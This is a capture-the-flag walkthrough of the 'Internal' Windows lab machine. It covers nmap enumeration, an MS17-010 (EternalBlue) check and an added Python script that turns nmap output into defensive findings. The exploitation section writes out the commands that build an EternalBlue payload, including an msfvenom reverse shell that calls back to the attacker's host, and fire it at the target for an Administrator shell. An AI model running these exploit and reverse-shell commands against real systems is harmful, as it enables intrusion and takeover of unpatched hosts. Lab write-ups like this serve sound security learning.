In this walkthrough, we will go through the Internal room from Proving Grounds. The room is rated Easy on the platform and consists of exploiting the MS17-010 (EternalBlue) vulnerability to get root on the system. So, let's get started without any delay.
Machine Info:

| Field | Value |
|---|---|
| Title | Internal |
| IP address | 192.168.166.40 |
| Difficulty | Easy |
| OS | Windows |
| Description | Internal is an Easy rated Windows machine that is vulnerable to the MS17-010 (EternalBlue) exploit. |
Enumeration:
- I started off with my regular nmap aggressive scan and found multiple open ports. The interesting ones were 135 (RPC), 139 and 445 (SMB), 3389 (RDP) and 5357 (HTTP).
```
$ sudo nmap -A 192.168.166.40
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:06 IST
Nmap scan report for 192.168.166.40
Host is up (0.20s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE            VERSION
53/tcp    filtered domain
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open     ssl/ms-wbt-server?
|_ssl-date: 2024-02-10T16:38:38+00:00; 0s from scanner time.
5357/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open     msrpc              Microsoft Windows RPC
49153/tcp open     msrpc              Microsoft Windows RPC
49154/tcp open     msrpc              Microsoft Windows RPC
49155/tcp open     msrpc              Microsoft Windows RPC
49156/tcp open     msrpc              Microsoft Windows RPC
49157/tcp open     msrpc              Microsoft Windows RPC
49158/tcp open     msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=2/10%OT=135%CT=1%CU=30488%PV=Y%DS=4%DC=T%G=Y%TM=65C7A6
OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TS=7)OPS(O1=M54ENW8ST1
OS:1%O2=M54ENW8ST11%O3=M54ENW8NNT11%O4=M54ENW8ST11%O5=M54ENW8ST11%O6=M54EST
OS:11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80
OS:%W=2000%O=M54ENW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R
OS:=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=N)T7
OS:(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=EAEB%RUD=G)
OS:IE(R=N)

Network Distance: 4 hops
Service Info: Host: INTERNAL; OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2

Host script results:
|_clock-skew: mean: 1h59m59s, deviation: 4h00m01s, median: -1s
|_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:a1:8b (VMware)
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: internal
|   NetBIOS computer name: INTERNAL\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-02-10T08:38:31-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-02-10T16:38:30
|_  start_date: 2023-02-18T02:15:24

TRACEROUTE (using port 5900/tcp)
HOP RTT       ADDRESS
1   199.51 ms 192.168.45.1
2   199.54 ms 192.168.45.254
3   199.55 ms 192.168.251.1
4   200.44 ms 192.168.166.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.75 seconds
```
- I started my enumeration with SMB (anonymous share listing with smbclient and smbmap) but got nothing back.

```
smbclient -L 192.168.166.40
smbmap -H 192.168.166.40
```
- Next, I ran the nmap `smb-vuln-ms17-010` NSE script against SMB port 445 to test for MS17-010 (EternalBlue) and got a positive hit.
```
$ sudo nmap -p445 --script smb-vuln-ms17-010 192.168.166.40
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-10 22:24 IST
Nmap scan report for 192.168.166.40
Host is up (0.21s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 3.07 seconds
```
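The two scans above (the `nmap -A` service scan and the `smb-vuln-ms17-010` check) together tell a defender everything needed to prioritise this host: SMB reachable, an old OS reported over SMB, signing not enforced, and MS17-010 unpatched. As an added example that is not part of the original walkthrough, the following Python script parses the plain-text output of both scans into a short list of findings. The embedded sample outputs are trimmed copies of the scans on this page; the `Port` class, `triage()` and the helper functions are my own and not part of nmap or any project the page mentions.

```python
"""Triage nmap text output for SMB exposure findings.

Added example, not part of the original walkthrough. It parses the plain-text
output of `nmap -A` and of `nmap --script smb-vuln-ms17-010` into a list of
findings a defender can act on (exposure, signing posture, missing patch).
"""
import re
from dataclasses import dataclass

# Constructed sample: a trimmed copy of the `nmap -A` output shown above.
NMAP_A_OUTPUT = """\
PORT      STATE    SERVICE            VERSION
53/tcp    filtered domain
135/tcp   open     msrpc              Microsoft Windows RPC
139/tcp   open     netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds       Windows Server (R) 2008 Standard 6001 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open     ssl/ms-wbt-server?
|_ssl-date: 2024-02-10T16:38:38+00:00; 0s from scanner time.
5357/tcp  open     http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
|_nbstat: NetBIOS name: INTERNAL, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:ba:a1:8b (VMware)
| smb-os-discovery:
|   OS: Windows Server (R) 2008 Standard 6001 Service Pack 1 (Windows Server (R) 2008 Standard 6.0)
|   Computer name: internal
|_  System time: 2024-02-10T08:38:31-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# Constructed sample: a trimmed copy of the smb-vuln-ms17-010 output shown above.
NMAP_VULN_OUTPUT = """\
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
"""

# "445/tcp open microsoft-ds <version>" port table rows.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# "| script-name:" with nothing after the colon opens a multi-line NSE block.
SCRIPT_START_RE = re.compile(r"^\| (\S+):\s*$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_ports(text):
    """Return every row of the nmap port table as a Port."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
    return ports


def script_block(text, script):
    """Return the body lines of the host-script block named `script`, de-piped."""
    lines, in_block = [], False
    for line in text.splitlines():
        if not line.startswith("|"):
            in_block = False          # left the script-results area
            continue
        m = SCRIPT_START_RE.match(line)
        if m:
            in_block = (m.group(1) == script)
            continue
        if in_block:
            lines.append(line.lstrip("|_").strip())
            if line.startswith("|_"):  # nmap marks the last line of a block with |_
                in_block = False
    return lines


def script_value(text, script, key):
    """Return the value of `key:` inside an NSE block, or None if absent."""
    for entry in script_block(text, script):
        name, sep, value = entry.partition(":")
        if sep and name.strip() == key:
            return value.strip()
    return None


def triage(scan_text, vuln_text=""):
    """Combine both scans into open ports, the SMB-reported OS and a findings list."""
    open_ports = sorted(p.number for p in parse_ports(scan_text) if p.state == "open")
    findings = []
    smb_ports = [p for p in open_ports if p in (139, 445)]
    if smb_ports:
        findings.append("SMB reachable on tcp/%s; restrict to trusted networks"
                        % ",".join(str(p) for p in smb_ports))
    if 3389 in open_ports:
        findings.append("RDP reachable on tcp/3389; restrict exposure")
    signing = script_value(scan_text, "smb-security-mode", "message_signing")
    if signing and signing.startswith("disabled"):
        findings.append("SMB1 message signing disabled; enforce signing by policy")
    if any("not required" in l for l in script_block(scan_text, "smb2-security-mode")):
        findings.append("SMB2 message signing enabled but not required")
    if script_value(vuln_text, "smb-vuln-ms17-010", "State") == "VULNERABLE":
        ids = script_value(vuln_text, "smb-vuln-ms17-010", "IDs")
        findings.append("MS17-010 unpatched (%s); install the MS17-010 update and disable SMBv1" % ids)
    return {"open_ports": open_ports,
            "os": script_value(scan_text, "smb-os-discovery", "OS"),
            "findings": findings}


if __name__ == "__main__":
    result = triage(NMAP_A_OUTPUT, NMAP_VULN_OUTPUT)
    print("open ports:", result["open_ports"])
    print("os:", result["os"])
    for f in result["findings"]:
        print("-", f)
```

To use it on a real engagement, save the two nmap runs with `-oN` and pass the file contents to `triage()`; the `smb-vuln-ms17-010` finding only appears when the second scan reports `State: VULNERABLE`, so a patched host produces the exposure findings alone.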
Exploitation & Getting root:
- I looked for EternalBlue exploits other than the Metasploit module. I found one on Exploit-DB, but it didn't seem to work, so I used a different one from GitHub.
- Set up the exploit requirements using the commands below. They create a Python 2 virtual environment with pyenv and install the required impacket version in it. Then we clone the exploit from GitHub, build the shellcode with nasm and msfvenom, and concatenate the kernel shellcode and the payload into one file, as the exploit requires. Finally, we run the exploit against the target, specifying its IP address.

```
# Activate a virtual environment
pyenv virtualenv 2.7.18 eternalblue
pyenv activate eternalblue
pip install impacket==0.9.22

# Clone the exploit
git clone https://github.com/worawit/MS17-010.git

# Create shell code
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.45.207 --platform windows -a x86 --format raw -o sc_x86_payload.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin

# Fire the exploit
python2 eternalblue.py 192.168.166.40 sc_x86.bin
```
- We got a shell back as Administrator on our netcat listener. We captured the root flag and marked the machine as complete.
Conclusion:
So that was "Internal" for you. We started off with a regular nmap scan and found multiple open ports: 135 (RPC), 139 and 445 (SMB), 3389 (RDP) and 5357 (HTTP). Next, we ran the nmap `smb-vuln-ms17-010` script and found that the host is vulnerable to MS17-010 (EternalBlue). We looked online for a related exploit; the Exploit-DB one did not work, so we used one from GitHub and fired it on the target to get root. On that note, I will take your leave and meet you in the next one. Till then, "Happy hacking".